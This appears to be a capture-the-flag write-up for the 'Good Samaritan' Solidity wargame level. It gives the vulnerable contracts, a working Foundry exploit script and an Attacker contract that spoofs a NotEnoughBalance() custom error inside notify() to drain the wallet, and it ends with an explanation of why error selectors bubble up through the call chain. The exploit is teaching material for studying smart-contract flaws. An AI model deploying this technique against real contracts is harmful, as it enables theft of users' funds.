Good-Samaritan
This instance represents a Good Samaritan that is wealthy and ready to donate some coins to anyone requesting it.
Would you be able to drain all the balance from his Wallet?
Things that might help:
// SPDX-License-Identifier: MIT
pragma solidity >=0.8.0 <0.9.0;
import "openzeppelin-contracts-08/utils/Address.sol";
contract GoodSamaritan {
Wallet public wallet;
Coin public coin;
constructor() {
wallet = new Wallet();
coin = new Coin(address(wallet));
wallet.setCoin(coin);
}
function requestDonation() external returns(bool enoughBalance){
// donate 10 coins to requester
try wallet.donate10(msg.sender) {
return true;
} catch (bytes memory err) {
if (keccak256(abi.encodeWithSignature("NotEnoughBalance()")) == keccak256(err)) {
// send the coins left
wallet.transferRemainder(msg.sender);
return false;
}
}
}
}
contract Coin {
using Address for address;
mapping(address => uint256) public balances;
error InsufficientBalance(uint256 current, uint256 required);
constructor(address wallet_) {
// one million coins for Good Samaritan initially
balances[wallet_] = 10**6;
}
function transfer(address dest_, uint256 amount_) external {
uint256 currentBalance = balances[msg.sender];
// transfer only occurs if balance is enough
if(amount_ <= currentBalance) {
balances[msg.sender] -= amount_;
balances[dest_] += amount_;
if(dest_.isContract()) {
// notify contract
INotifyable(dest_).notify(amount_);
}
} else {
revert InsufficientBalance(currentBalance, amount_);
}
}
}
contract Wallet {
// The owner of the wallet instance
address public owner;
Coin public coin;
error OnlyOwner();
error NotEnoughBalance();
modifier onlyOwner() {
if(msg.sender != owner) {
revert OnlyOwner();
}
_;
}
constructor() {
owner = msg.sender;
}
function donate10(address dest_) external onlyOwner {
// check balance left
if (coin.balances(address(this)) < 10) {
revert NotEnoughBalance();
} else {
// donate 10 coins
coin.transfer(dest_, 10);
}
}
function transferRemainder(address dest_) external onlyOwner {
// transfer balance left
coin.transfer(dest_, coin.balances(address(this)));
}
function setCoin(Coin coin_) external onlyOwner {
coin = coin_;
}
}
interface INotifyable {
function notify(uint256 amount) external;
}Solution:
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Script.sol";
import "forge-std/console.sol";
import {Attacker,GoodSamaritan} from '../src/27.sol';
contract POC is Script {
function run() external {
uint256 deployerPrivateKey = vm.envUint("PRIVATE_KEY");
address addr = vm.envAddress("INSTANCE_27");
vm.startBroadcast(deployerPrivateKey);
GoodSamaritan goodSamaritan = GoodSamaritan(addr);
Attacker attacker = new Attacker();
attacker.attack(goodSamaritan);
vm.stopBroadcast();
}
}// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;
import "../lib/forge-std/src/console.sol";
interface GoodSamaritan {
function requestDonation() external returns(bool enoughBalance);
}
interface INotifyable {
function notify(uint256 amount) external;
}
contract Attacker is INotifyable {
error NotEnoughBalance();
function notify(uint256 value) external pure {
if (value == 10) {
revert NotEnoughBalance();
}
}
function attack(GoodSamaritan goodSamaritan) public {
goodSamaritan.requestDonation();
}
}Congratulations!
Custom errors in Solidity are identified by their 4-byte ‘selector’,
the same as a function call. They are bubbled up through the call chain
until they are caught by a catch statement in a try-catch block, as seen
in the GoodSamaritan’s requestDonation() function. For
these reasons, it is not safe to assume that the error was thrown by the
immediate target of the contract call (i.e., Wallet in this case). Any
other contract further down in the call chain can declare the same error
and throw it at an unexpected location, such as in the notify(uint256 amount) function in your attacker contract.